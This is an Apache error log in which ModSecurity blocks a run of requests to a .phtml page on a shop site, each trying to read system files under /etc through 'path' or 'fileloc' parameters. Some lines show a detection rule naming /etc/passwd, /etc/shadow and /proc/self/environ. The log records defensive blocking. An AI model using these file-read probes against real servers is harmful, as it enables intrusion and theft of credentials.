[Thu Mar 19 16:05:24.431062 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.69:58838] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI9PXLqtnMIWvjpaJDJQAAAo8"]
[Thu Mar 19 16:05:26.706863 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.51:58878] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI9v-YZRR_7pZ7nDKvngAAA9E"]
[Thu Mar 19 16:05:27.072705 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.62:58886] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI9_qxLDW4GITHUkSNlwAAAQM"]
[Thu Mar 19 16:05:28.473015 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.11:58916] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-BCii7xarUs8iHYO7QAAAgk"]
[Thu Mar 19 16:05:28.593581 2026] [:error] [pid 5816:tid 140411725141760] [client 57.141.18.93:58920] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-JfmNfuxceSuAEK6JAAAAcI"]
[Thu Mar 19 16:05:29.348580 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.118:58926] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-QkwaGbbGflqUZDv9QAAAMU"]
[Thu Mar 19 16:05:29.817473 2026] [:error] [pid 5816:tid 140411641214720] [client 57.141.18.68:58940] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-ZfmNfuxceSuAEK6JQAAAcw"]
[Thu Mar 19 16:05:30.603544 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.93:58956] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-v-YZRR_7pZ7nDKvoAAAA9E"]
[Thu Mar 19 16:05:30.838874 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.25:58960] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-hCii7xarUs8iHYO7wAAAgQ"]
[Thu Mar 19 16:05:31.725884 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.106:58978] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI-_XLqtnMIWvjpaJDKgAAApQ"]
[Thu Mar 19 16:05:32.516307 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.82:59000] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI_PqxLDW4GITHUkSNmwAAAQI"]
[Thu Mar 19 16:05:33.683236 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.95:59024] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI_RCii7xarUs8iHYO8AAAAgY"]
[Thu Mar 19 16:05:35.145276 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.29:59062] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI__-YZRR_7pZ7nDKvowAAA9E"]
[Thu Mar 19 16:05:35.910251 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.78:59088] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxI_9a6ubjKNq_cu4Z6wQAAA1g"]
[Thu Mar 19 16:05:36.119731 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.59:59094] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAEpm7ZmxKZTM4bZpSgAAA5Y"]
[Thu Mar 19 16:05:36.807620 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.53:59114] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAAkwaGbbGflqUZDv-QAAAMU"]
[Thu Mar 19 16:05:38.278431 2026] [:error] [pid 8307:tid 140411733534464] [client 57.141.18.88:59134] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAb-FhjpZGs9ba8qPWwAAAwE"]
[Thu Mar 19 16:05:38.289140 2026] [:error] [pid 19655:tid 140411641214720] [client 57.141.18.70:59122] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAE1ujooLWdUDGy75uQAAAEw"]
[Thu Mar 19 16:05:38.289958 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.62:59148] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAvXLqtnMIWvjpaJDLwAAApU"]
[Thu Mar 19 16:05:38.885936 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.49:59170] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJAgkwaGbbGflqUZDv-gAAAMw"]
[Thu Mar 19 16:05:39.120134 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.109:59180] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJA_-YZRR_7pZ7nDKvpAAAA9E"]
[Thu Mar 19 16:05:41.742134 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.45:59256] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJBfqxLDW4GITHUkSNnwAAAQU"]
[Thu Mar 19 16:05:43.596218 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.106:59306] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJB9a6ubjKNq_cu4Z6xAAAA1I"]
[Thu Mar 19 16:05:43.953155 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.96:59314] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJB0pm7ZmxKZTM4bZpTwAAA5Y"]
[Thu Mar 19 16:05:46.274632 2026] [:error] [pid 19655:tid 140411641214720] [client 57.141.18.35:59370] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJCU1ujooLWdUDGy75vQAAAEw"]
[Thu Mar 19 16:05:46.277209 2026] [:error] [pid 5816:tid 140411725141760] [client 57.141.18.101:59378] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJCZfmNfuxceSuAEK6KwAAAcI"]
[Thu Mar 19 16:05:46.279132 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.65:59372] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJCf-YZRR_7pZ7nDKvqAAAA8k"]
[Thu Mar 19 16:05:47.114533 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:05:49.250989 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.29:59458] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDAkwaGbbGflqUZDwAQAAAMg"]
[Thu Mar 19 16:05:49.252001 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.70:59450] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJDAkwaGbbGflqUZDv_wAAAMw"]
